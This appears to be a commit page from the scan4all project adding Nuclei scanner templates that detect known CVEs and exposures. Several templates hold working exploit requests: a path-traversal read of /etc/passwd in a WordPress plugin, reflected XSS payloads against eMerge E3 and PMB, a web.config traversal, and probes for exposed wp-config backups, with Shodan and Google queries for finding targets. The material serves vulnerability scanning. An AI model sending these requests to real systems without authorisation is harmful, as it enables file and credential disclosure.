crash.software
Projects
Pull Requests
Issues
Builds
scan4all
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
List
Boards
Milestones
Builds
Statistics
Contributions
Source Lines
Child Projects
Projects
STRLCPY
scan4all
Commits
c8e13f02
🤬
Sign In
up PoCs 2022-09-01
hktalent
committed
2 years ago
c8e13f02
1 parent
b49ed62a
Total 10 files
Show one by one
■ ■ ■ ■ ■ ■
config/nuclei-templates/cves/2015/CVE-2015-5469.yaml
1
+
id: CVE-2015-5469
2
+
info:
3
+
name: Wordpress MDC YouTube Downloader plugin v2.1.0 - Remote file download
4
+
author: 0x_Akoko
5
+
severity: high
6
+
description: Absolute path traversal vulnerability in the MDC YouTube Downloader plugin 2.1.0 for WordPress allows remote attackers to read arbitrary files via a full pathname in the file parameter to includes/download.php.
7
+
reference:
8
+
- https://www.openwall.com/lists/oss-security/2015/07/10/5
9
+
- https://www.cvedetails.com/cve/CVE-2015-5469/
10
+
- http://www.vapid.dhs.org/advisory.php?v=133
11
+
- http://www.openwall.com/lists/oss-security/2015/07/10/5
12
+
classification:
13
+
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
14
+
cvss-score: 7.5
15
+
cve-id: CVE-2015-5469
16
+
cwe-id: CWE-22
17
+
tags: cve,cve2015,wp,lfi
18
+
19
+
requests:
20
+
- method: GET
21
+
path:
22
+
- "{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"
23
+
24
+
matchers-condition: and
25
+
matchers:
26
+
27
+
- type: regex
28
+
regex:
29
+
- "root:[x*]:0:0"
30
+
31
+
- type: status
32
+
status:
33
+
- 200
34
+
All occurrences
■ ■ ■ ■ ■ ■
config/nuclei-templates/cves/2019/CVE-2019-7255.yaml
1
+
id: CVE-2019-7255
2
+
3
+
info:
4
+
name: Linear eMerge E3 - Cross Site Scripting
5
+
author: arafatansari
6
+
severity: medium
7
+
description: |
8
+
Linear eMerge E3-Series devices allow XSS via layout parameter.
9
+
reference:
10
+
- https://www.applied-risk.com/resources/ar-2019-005
11
+
- https://packetstormsecurity.com/files/155253/Linear-eMerge-E3-1.00-06-Cross-Site-Scripting.html
12
+
- https://nvd.nist.gov/vuln/detail/CVE-2019-7255
13
+
- https://applied-risk.com/labs/advisories
14
+
classification:
15
+
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
16
+
cvss-score: 6.1
17
+
cve-id: CVE-2019-7255
18
+
cwe-id: CWE-79
19
+
metadata:
20
+
shodan-query: http.title:"eMerge"
21
+
verified: "true"
22
+
tags: emerge,xss,packetstorm,cve,cve2019,nortek
23
+
24
+
requests:
25
+
- method: GET
26
+
path:
27
+
- "{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
28
+
29
+
matchers-condition: and
30
+
matchers:
31
+
- type: word
32
+
part: body
33
+
words:
34
+
- 'Template : <script>alert(document.domain)</script>'
35
+
36
+
- type: word
37
+
part: header
38
+
words:
39
+
- text/html
40
+
41
+
- type: status
42
+
status:
43
+
- 200
44
+
All occurrences
■ ■ ■ ■
■
■
config/nuclei-templates/cves/2022/CVE-2022-2383.yaml
skipped 11 lines
12
12
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2383
13
13
- https://nvd.nist.gov/vuln/detail/CVE-2022-2383
14
14
classification:
15
+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
16
+
cvss-score: 6.1
15
17
cve-id: CVE-2022-2383
18
+
cwe-id: CWE-79
16
19
metadata:
17
-
verified: true
20
+
verified:
"
true
"
18
21
tags: wp,wordpress,wp-plugin,wpscan,cve,cve2022,xss
19
22
20
23
requests:
skipped 20 lines
All occurrences
■ ■ ■ ■ ■ ■
config/nuclei-templates/cves/2022/CVE-2022-34328.yaml
1
+
id: CVE-2022-34328
2
+
3
+
info:
4
+
name: PMB 7.3.10 - Cross Site Scripting
5
+
author: edoardottt
6
+
severity: medium
7
+
description: |
8
+
PMB 7.3.10 allows reflected XSS via the id parameter in an lvl=author_see request to index.php.
9
+
reference:
10
+
- https://github.com/jenaye/PMB/blob/main/README.md
11
+
- https://nvd.nist.gov/vuln/detail/CVE-2022-34328
12
+
- https://github.com/jenaye/PMB
13
+
classification:
14
+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
15
+
cvss-score: 6.1
16
+
cve-id: CVE-2022-34328
17
+
cwe-id: CWE-79
18
+
metadata:
19
+
shodan-query: http.html:"PMB Group"
20
+
verified: "true"
21
+
tags: cve,cve2022,pmb,xss
22
+
23
+
requests:
24
+
- method: GET
25
+
path:
26
+
- "{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
27
+
28
+
matchers-condition: and
29
+
matchers:
30
+
- type: word
31
+
part: body
32
+
words:
33
+
- "<script>alert(document.domain)</script>' target='cart_info"
34
+
35
+
- type: word
36
+
part: header
37
+
words:
38
+
- text/html
39
+
40
+
- type: status
41
+
status:
42
+
- 200
43
+
All occurrences
■ ■ ■ ■ ■ ■
config/nuclei-templates/exposed-panels/eMerge-panel.yaml
1
+
id: eMerge-panel
2
+
3
+
info:
4
+
name: Nortek Linear eMerge - Panel Detect
5
+
author: arafatansari
6
+
severity: info
7
+
metadata:
8
+
verified: true
9
+
shodan-query: http.title:"eMerge"
10
+
tags: panel,emerge,nortek
11
+
12
+
requests:
13
+
- method: GET
14
+
path:
15
+
- "{{BaseURL}}"
16
+
17
+
matchers-condition: and
18
+
matchers:
19
+
- type: regex
20
+
part: body
21
+
regex:
22
+
- '<title>(.*)Linear eMerge(.*)</title>'
23
+
- '/emerge.ico'
24
+
condition: or
25
+
26
+
- type: status
27
+
status:
28
+
- 200
29
+
All occurrences
■ ■ ■ ■
■
■
config/nuclei-templates/exposures/configs/web-config.yaml
skipped 1 lines
2
2
3
3
info:
4
4
name: Web Config file
5
-
author: Yash Anand @yashanand155
5
+
author: Yash Anand @yashanand155
,
DhiyaneshDK
6
6
severity: info
7
+
reference: https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json
7
8
tags: config,exposure
8
9
9
10
requests:
10
11
- method: GET
11
12
path:
12
13
- '{{BaseURL}}/web.config'
14
+
- '{{BaseURL}}/../../web.config'
13
15
14
16
matchers-condition: and
15
17
matchers:
skipped 6 lines
22
24
- type: status
23
25
status:
24
26
- 200
27
+
All occurrences
■ ■ ■ ■ ■ ■
config/nuclei-templates/misconfiguration/aem/aem-osgi-bundles.yaml
1
+
id: aem-osgi-bundles
2
+
3
+
info:
4
+
name: Adobe AEM Installed OSGI Bundles
5
+
author: dhiyaneshDk
6
+
severity: low
7
+
reference:
8
+
- https://www.slideshare.net/0ang3el/hacking-aem-sites
9
+
metadata:
10
+
shodan-query:
11
+
- http.title:"AEM Sign In"
12
+
- http.component:"Adobe Experience Manager"
13
+
tags: misconfig,aem,adobe
14
+
15
+
requests:
16
+
- method: GET
17
+
path:
18
+
- "{{BaseURL}}/bin.tidy.infinity.json"
19
+
20
+
matchers-condition: and
21
+
matchers:
22
+
- type: word
23
+
words:
24
+
- '"jcr:primaryType":'
25
+
- '"jcr:uuid":'
26
+
condition: and
27
+
28
+
- type: status
29
+
status:
30
+
- 200
31
+
All occurrences
■ ■ ■ ■ ■ ■
config/nuclei-templates/misconfiguration/aws-s3-explorer.yaml
1
+
id: aws-s3-explorer
2
+
3
+
info:
4
+
name: AWS S3 Explorer
5
+
author: DhiyaneshDk
6
+
severity: low
7
+
reference:
8
+
- https://www.exploit-db.com/ghdb/7967
9
+
metadata:
10
+
verified: true
11
+
google-dork: inurl:s3.amazonaws.com intitle:"AWS S3 Explorer"
12
+
tags: s3,edb,misconfig,aws,amazon
13
+
14
+
requests:
15
+
- method: GET
16
+
path:
17
+
- "{{BaseURL}}/index.html"
18
+
19
+
matchers-condition: and
20
+
matchers:
21
+
- type: word
22
+
words:
23
+
- '<title>AWS S3 Explorer</title>'
24
+
25
+
- type: word
26
+
part: header
27
+
words:
28
+
- text/html
29
+
30
+
- type: status
31
+
status:
32
+
- 200
33
+
All occurrences
■ ■ ■ ■ ■ ■
config/nuclei-templates/technologies/zap-api-detect.yaml
1
+
id: zap-rest-api-detect
2
+
3
+
info:
4
+
name: ZAP Rest API Server Running
5
+
author: hahwul
6
+
severity: info
7
+
reference:
8
+
- https://www.zaproxy.org/docs/api/
9
+
tags: zap,tech
10
+
11
+
requests:
12
+
- method: GET
13
+
path:
14
+
- "{{BaseURL}}"
15
+
16
+
matchers:
17
+
- type: word
18
+
part: response
19
+
words:
20
+
- '<title>ZAP API UI</title>'
21
+
- 'Welcome to the OWASP Zed Attack Proxy (ZAP)'
22
+
- 'Access-Control-Allow-Headers: ZAP-Header'
23
+
condition: or
All occurrences
■ ■
■
■ ■ ■
config/nuclei-templates/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
skipped 1 lines
2
2
3
3
info:
4
4
name: WordPress wp-config Detection
5
-
author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
5
+
author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
,
tess
6
6
severity: medium
7
7
description: WordPress `wp-config` was discovered. This file is remotely accessible and its content available for reading.
8
8
classification:
skipped 23 lines
32
32
- '{{BaseURL}}/wp-config.php~'
33
33
- '{{BaseURL}}/wp-config.php-backup'
34
34
- '{{BaseURL}}/wp-config.php.orig'
35
+
- '{{BaseURL}}/wp-config.php_orig'
35
36
- '{{BaseURL}}/wp-config.php.original'
36
37
- '{{BaseURL}}/_wpeprivate/config.json'
37
38
skipped 16 lines
All occurrences
Please wait...
Page is in error, reload to recover